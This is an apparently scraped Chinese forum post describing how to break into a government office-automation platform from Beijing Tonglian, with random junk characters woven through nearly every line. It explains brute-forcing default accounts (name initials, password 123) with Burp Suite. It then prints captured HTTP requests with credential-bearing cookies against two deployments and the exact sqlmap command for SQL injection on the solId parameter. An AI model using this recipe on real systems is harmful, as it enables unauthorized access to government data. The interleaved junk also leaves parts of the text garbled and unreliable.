|
5 L8 D- Q$ _0 M! e0 D2 o
6 E2 S9 Y' q! i% p$ H3 {3 y a
f5 ~+ m1 ?; b7 m7 E- C7 c- k; ?, ?( K/ C. R$ |6 p
平台简介:+ R" i# Z) C8 C! r. C, |
) t5 E; r4 d) Q0 g6 G
* X T4 F3 p3 W z% S
; M/ v* N2 K; H/ @
7 `* E4 [8 M. f5 N% D7 i* `% ~
/ H2 _: v& i! W) U9 M J 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
- G3 w( l6 `- V+ R同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
$ W$ @9 ?& ?: [4 v h- U同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!6 |5 X. `8 i9 o7 x
7 O8 ~; R' F+ Z" i
8 z0 u* F5 m, W: h& a$ i9 m8 ~# }+ T: y
: f/ ^1 B; a/ v( S3 ]1 _; h8 ]
8 F3 X+ ~) a6 X8 p0 B9 R3 X/ a; C! s$ Y% u- w/ _8 O
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
; V* `9 q* I4 ^ . D5 c& _' {8 |! @+ y$ r
q5 _2 u+ z |4 Y9 f! n
4 K- m% j- x0 M4 v . S1 [0 R# V' X5 q; `8 c" H* J
- {( i7 e7 G7 ~* R2 Q$ `. D http://1.1.1.1:7197/cap-aco/#(案例2-)1 C. H- ^* d* {) G& w; Z
9 s+ B4 R Q8 E* y, W/ j% X
2 C q5 ?1 I' s5 F$ D6 Y http://www.XXOO.com (案例1-官网网站): h( e/ O! y* }9 r1 T
+ w3 U6 W6 x7 }3 G; i: V6 O7 Y7 A0 W/ b5 K' O* T* t7 x4 n
! q [" g& w* @) e2 H& ^
+ }: _& i# @; A0 i5 G4 V5 n
( i, n7 g$ K! Y7 ?5 u 漏洞详情:
0 W& H( q0 Z4 p4 K" W0 p3 G
$ p& n0 P; J2 s( J8 u% Z; }) u0 o, k& |7 b6 d: A3 ?- Z
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
3 t N q% A$ O& j 0 f& M/ n2 H- k' j5 _- g0 i
7 w; m6 j! X, s3 s, S, P0 [ 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:( k% Q* A/ T; f/ c* S3 [1 U. w+ p
* b5 }/ F" f8 A' A
, }& K1 h. r0 t! B! v8 V, G : m' a6 t* W, b7 Z! A! L J
. }$ a1 _( [# p- N3 M
3 @5 K6 a0 @7 L
/ @% m4 G5 B T( y& {+ Z
- F/ h7 u o2 {5 M9 g. M& b9 U2 ]% L! U9 n: Q, Q+ `
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
* i6 x; b t& a: [- I( f. I % p2 I l- ~+ J6 f- S4 Q
9 ^$ P! _; ?2 R6 A9 ~! K 1、案例1-官方网站+ a$ j1 Y0 N [; ]. s
1 P- k, T2 F1 x* `) R, u
$ R Y9 g: m$ ^" V7 L- w) U GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
) {7 G0 O* ^1 r! ^ 7 Q8 q+ r- o: a3 q( J/ G# J
2 z3 |1 O5 {; c/ t0 h% S5 H Host: www.XXOO.com
4 p* M# \, U) P4 a o; @ . v1 H2 D0 ?' \) z
' g, W1 u$ A! k9 H7 b6 @6 y
Proxy-Connection: Keep-Alive
( n" `+ \) [+ J. r( l7 l
+ {! b( H% w @& @: p9 y% ]6 w c2 ~) ~7 V: K
Accept: application/json, text/javascript, */*; q=0.01. ?4 H8 y* z' ?3 b$ _* f/ U
, N' H3 F* N2 w5 X( C' a+ e; j
& o8 J: z T: `0 g Accept-Language: zh-CN
" T/ U! E2 }2 G0 M2 T: ~2 g; y - A" @( Y4 M2 v( j. W
+ D, n ?; x6 }7 x' w# N2 ] Content-Type: application/json
- ]7 E9 f C5 ~, E
1 {' p1 D( A3 S A+ j* S9 e9 x& i$ r. K) |, E
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
* Q% a0 E0 |2 t+ P; y, c) F 4 q4 s' s$ l5 Y7 X* ^: w
4 J, r% @+ j. B6 P1 F X-Requested-With: XMLHttpRequest! k( r: j7 `1 U M
: R4 e% t+ M3 ^7 v2 ^" |
/ V5 ], u- J2 n Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
/ D* U0 e# A( d& U4 n0 _+ a2 E
. {% s; n; ^- ], Z6 m2 j
% \3 [$ z$ S t7 Y+ p: H Accept-Encoding: gzip, deflate, sdch+ y3 `: I+ S4 O3 j. E ?
. V0 i7 m! O& _, H, T% g
V- }( O R2 T" K7 N) \# |
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
+ c7 S! b3 |6 y( [7 @* d 6 n! z" W/ r; P6 ?7 a
, ~8 m* A. o/ D4 h' Y1 I 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:% T% K6 o* a, y- V! L
% X# a! j0 K- y2 z4 n% `1 P
z! b1 _9 a" w! E6 [3 }6 o0 L2 ` 8 ]7 X3 J4 G5 ]) i; G' g/ P. o# Y/ p0 Y$ p
2 N" ^$ x5 t$ G: h0 o9 y
; M! a$ P5 ?8 y( @9 S7 Y
# M' a5 X6 Q% m
& O \- }& ~: G6 t+ n% k! f; n6 \$ M% z7 W
! j& \8 Q! Z$ t; f 5 {9 T; V0 F% |
, ?$ o. g( x' ]- a9 z' J+ T) H 8 l" f; a3 l" h* N$ w1 w4 X
! |1 O4 m5 s$ p3 A( c4 a6 k; P8 F* Y# {. f1 H
+ H/ U0 _! U1 ] k" R/ Q: o & T% m8 u; a8 s& E1 f
2 M1 v9 U4 L, u+ `1 F8 w0 q. d 2、案例2-某天河云平台0 R0 K4 R' j/ D4 ?/ r2 Q
- p. V3 {2 `' z# K6 ~- @; }" a6 s5 a, ~2 c3 F# n
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1, r: u; M3 }+ D( c* O
) o# p7 { |+ y! G! P# C- ?6 j
& `$ b8 j H! [/ e* o) J; L Host: 1.1.1.:7197
0 b; Z% r) b/ Z
3 b7 p: _. L3 @( u, I! d
7 J9 j4 Q: E$ z" d0 e5 R Accept: application/json, text/javascript, */*; q=0.01
9 t+ S9 o4 k, Z7 r - m7 G2 r" ]0 x4 J! z0 `
- _, i, {! m: k4 u7 Z. j# n. e X-Requested-With: XMLHttpRequest( P6 U5 n; u f" U) W# S t5 X
' }; x5 {' p! @* o1 o$ g+ E- M3 |4 H' J, C0 j
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.03 f3 t( G2 Y! R# V! d
4 h; E- c$ j% A( M6 o, D p
- c2 V' k9 Q4 x* A6 w; m# j
Content-Type: application/json
$ K) ?4 o+ F Z# J7 ?9 L+ m/ L $ x+ @6 D3 N! n* Y! ]( M
9 l) N) @" o; T# X. p9 u7 t! J7 f
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
1 T. G& E; j: b$ W3 c0 U
: Q" C7 x' e7 E# {5 ?8 ^! p& X) A5 T8 I7 p: M' P
Accept-Language: zh-CN,zh;q=0.8
& F3 z. P0 X4 @9 r
0 S( M$ {& G A9 ]0 ]! Z8 ~# B% ]/ J) j- N; M8 Q, o+ P, y
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=14 ^& e5 w2 w. V
! p$ Q9 G, M8 [2 e( [) `0 G
" }6 j% M/ Z Z5 o0 a Connection: close9 b ^/ D' h: ~0 s" ?
6 g8 n. e' S& o! u! W0 m( _2 a- w# a/ H1 d8 ], G
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:8 b4 t L% Q1 F3 C6 ~0 Z
/ R* P" V1 m h: X* Z
( u( P9 E: |) I$ g : `# \+ |" P" W3 ^ d+ x2 S
6 y$ N" C# u3 _( g( Z% A) C; d
4 i5 B, l( T% h: G/ X
0 k6 a* V8 G$ T6 \ |